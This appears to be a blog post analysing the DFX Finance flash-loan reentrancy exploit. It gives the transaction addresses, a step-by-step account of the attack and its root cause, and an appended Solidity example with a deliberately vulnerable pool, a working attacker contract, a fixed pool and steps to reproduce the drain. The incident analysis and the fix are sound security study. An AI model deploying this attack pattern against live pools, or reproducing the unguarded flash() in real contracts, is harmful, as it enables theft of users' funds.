{"content":{"title":"DFX Finance Reentrancy Vulnerability","body":"# 1.\tOverview of the DFX Finance reentrancy vulnerability\r\nhttps://twitter.com/BlockSecTeam/status/1590960299246780417\r\n\r\n![1.png](https://img.learnblockchain.cn/attachments/2022/11/X5vY6RCw63845e042452a.png)\r\n# 2.\tRelated addresses and transactions\r\nAttack transaction: 0x390def749b71f516d8bf4329a4cb07bb3568a3627c25e607556621182a17f1f9\r\nVulnerable contract:\r\n0x46161158b1947d9149e066d6d31af1283b2d377c\r\nAttack contract:\r\n0x6cFa86a352339E766FF1cA119c8C40824f41F22D\r\nAttacker address:\r\n0x14c19962e4a899f29b3dd9ff52ebfb5e4cb9a067\r\n# 3.\tProfit analysis\r\nhttps://phalcon.blocksec.com/tx/eth/0x390def749b71f516d8bf4329a4cb07bb3568a3627c25e607556621182a17f1f9\r\n\r\n![2.png](https://img.learnblockchain.cn/attachments/2022/11/9RFD0DuL63845e431b04e.png)\r\n# 4.\tAttack process and root cause\r\n1.\tThe attacker first calls viewDeposit() on the DFX contract 0x78ac to learn that obtaining 200000.000000000000000000 liquidity tokens requires depositing 2325581395.325581 XIDR and 100000.000000 USDC;\r\n\r\n![3.png](https://img.learnblockchain.cn/attachments/2022/11/TUiLdSAa63845e6c5b607.png)\r\n2.\tThe attacker then flash-loans 100,000 USDC from the Uniswap V3: DAI-USDC 4 pool, flash-loans 2,325,581,395.325581 XIDR from the Uniswap V3: USDC-XIDR pool, and finally flash-loans 2,313,953,488.348954 XIDR and 99,500 USDC from dfx-xidr-v2 itself. At this point the funds are in place.\r\n\r\n![4.png](https://img.learnblockchain.cn/attachments/2022/11/GZBjitie63845e819800e.png)\r\n\r\n![5.png](https://img.learnblockchain.cn/attachments/2022/11/jBpwcqIF63845e8b31911.png)\r\n3.\tStill inside the dfx-xidr-v2 flash-loan callback, the attacker deposits the borrowed funds into the dfx-xidr-v2 contract through deposit(), 2,325,581,395.325581 XIDR and 100,000 USDC in total, and receives 300,886.541899570004966586 dfx-xidr-usdc-v2 LP tokens:\r\n\r\n![6.png](https://img.learnblockchain.cn/attachments/2022/11/rDqSfaIb63845e9f55ada.png)\r\n4.\tAt this point the theft is effectively complete. The root cause is that flash() is not protected by the nonReentrant modifier, so the attacker can take the flash loan and, before repaying it, re-enter the contract through deposit(). The deposit moves the borrowed tokens back into the pool (the deposited amounts exceed the borrowed amounts, so the flash fee is covered as well), which satisfies the balance check flash() performs after the callback, while the attacker keeps the LP tokens minted for that deposit and uses them to withdraw afterwards:\r\n\r\n![7.png](https://img.learnblockchain.cn/attachments/2022/11/ivgB7rfo63845ebd35e7e.png)\r\n\r\n![8.png](https://img.learnblockchain.cn/attachments/2022/11/jG7ZfU9a63845ec3d320a.png)\r\n5.\tThe attacker then calls withdraw() directly to redeem USDC and XIDR, repays the flash loans, and the attack is complete.\r\n\r\n![9.png](https://img.learnblockchain.cn/attachments/2022/11/Zb2EpuNb63845edd4b855.png)"},"author":{"user":"https://learnblockchain.cn/people/10579","address":null},"history":null,"timestamp":1669619479,"version":1}
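Appended here as an added, illustrative Solidity example of the pattern described in steps 2 to 5 above; it is not DFX Finance's source code and not the attack contract at 0x6cFa86a352339E766FF1cA119c8C40824f41F22D. It shows a stripped-down two-token pool whose flash() takes no reentrancy lock while deposit() and withdraw() do, an attacker contract that deposits the loan back inside the flash callback and withdraws after the balance check has passed, and the hardened pool that holds the lock for the whole flash. The contract and function names, the 0.5% fee constant, the 1:1 LP pricing and the assumption that the attacker contract is pre-funded to cover the fee are all assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Minimal ERC20 surface used below.
interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
    function transferFrom(address, address, uint256) external returns (bool);
    function approve(address, uint256) external returns (bool);
}

interface IFlashCallback {
    function flashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external;
}

// Illustrative two-token pool (assumed names and toy 1:1 LP pricing; not DFX's code).
contract VulnerablePool {
    IERC20 public immutable token0;
    IERC20 public immutable token1;
    uint256 public constant FEE_BPS = 50;          // 0.5% flash fee, assumed for the example
    mapping(address => uint256) public lpBalance;
    uint256 public totalLp;
    uint256 private _lock = 1;

    modifier nonReentrant() {
        require(_lock == 1, "reentrant");
        _lock = 2;
        _;
        _lock = 1;
    }
    constructor(IERC20 t0, IERC20 t1) { token0 = t0; token1 = t1; }

    // deposit() and withdraw() are guarded; the guard is useless while flash() is not.
    function deposit(uint256 amount0, uint256 amount1) external nonReentrant returns (uint256 lp) {
        require(token0.transferFrom(msg.sender, address(this), amount0), "t0 in");
        require(token1.transferFrom(msg.sender, address(this), amount1), "t1 in");
        lp = amount0 + amount1;                     // toy pricing: one LP unit per token unit
        lpBalance[msg.sender] += lp;
        totalLp += lp;
    }
    function withdraw(uint256 lp) external nonReentrant {
        require(lpBalance[msg.sender] >= lp, "lp");
        uint256 out0 = token0.balanceOf(address(this)) * lp / totalLp;
        uint256 out1 = token1.balanceOf(address(this)) * lp / totalLp;
        lpBalance[msg.sender] -= lp;
        totalLp -= lp;
        require(token0.transfer(msg.sender, out0) && token1.transfer(msg.sender, out1), "out");
    }

    // BUG: flash() takes no lock, so deposit() is callable from the callback, and a deposit of
    // the borrowed tokens (plus fee) satisfies the balance-only repayment check in _flash().
    function flash(address to, uint256 amount0, uint256 amount1, bytes calldata data) external virtual {
        _flash(to, amount0, amount1, data);
    }
    function _flash(address to, uint256 amount0, uint256 amount1, bytes calldata data) internal {
        uint256 fee0 = (amount0 * FEE_BPS + 9_999) / 10_000;   // fee rounded up
        uint256 fee1 = (amount1 * FEE_BPS + 9_999) / 10_000;
        uint256 before0 = token0.balanceOf(address(this));
        uint256 before1 = token1.balanceOf(address(this));
        if (amount0 > 0) require(token0.transfer(to, amount0), "t0 out");
        if (amount1 > 0) require(token1.transfer(to, amount1), "t1 out");
        IFlashCallback(msg.sender).flashCallback(fee0, fee1, data);
        // Only the pool's balance is checked, not how the tokens came back or who owns the LP tokens.
        require(token0.balanceOf(address(this)) >= before0 + fee0, "t0 not repaid");
        require(token1.balanceOf(address(this)) >= before1 + fee1, "t1 not repaid");
    }
}

// Fix: hold the reentrancy lock for the whole flash, so deposit()/withdraw() in the callback revert.
contract FixedPool is VulnerablePool {
    constructor(IERC20 t0, IERC20 t1) VulnerablePool(t0, t1) {}
    function flash(address to, uint256 amount0, uint256 amount1, bytes calldata data) external override nonReentrant {
        _flash(to, amount0, amount1, data);
    }
}

// Attacker: borrow, deposit the loan back as liquidity during the callback, withdraw afterwards.
// Assumed to be pre-funded with enough of both tokens to cover the flash fees.
contract Attacker is IFlashCallback {
    VulnerablePool public immutable pool;
    constructor(VulnerablePool p) { pool = p; }

    function attack(uint256 amount0, uint256 amount1) external {
        pool.flash(address(this), amount0, amount1, "");
        // flash() returned, so its balance check passed; the LP tokens minted in the callback are ours.
        pool.withdraw(pool.lpBalance(address(this)));
    }
    function flashCallback(uint256, uint256, bytes calldata) external override {
        require(msg.sender == address(pool), "caller");
        IERC20 t0 = pool.token0(); IERC20 t1 = pool.token1();
        uint256 bal0 = t0.balanceOf(address(this));   // loan plus pre-funded fee
        uint256 bal1 = t1.balanceOf(address(this));
        t0.approve(address(pool), bal0);
        t1.approve(address(pool), bal1);
        pool.deposit(bal0, bal1);   // re-entry: succeeds against VulnerablePool, reverts "reentrant" against FixedPool
    }
}
```

To reproduce the sequence, deploy two mock ERC20s, seed a VulnerablePool with liquidity, transfer fee coverage to an Attacker pointed at it, and call attack(loan0, loan1): the deposit inside flashCallback returns the borrowed tokens, the balance check passes, and withdraw() then drains the attacker's share of the pool. Against FixedPool the same call reverts in deposit() with "reentrant", which is the check the page identifies as missing.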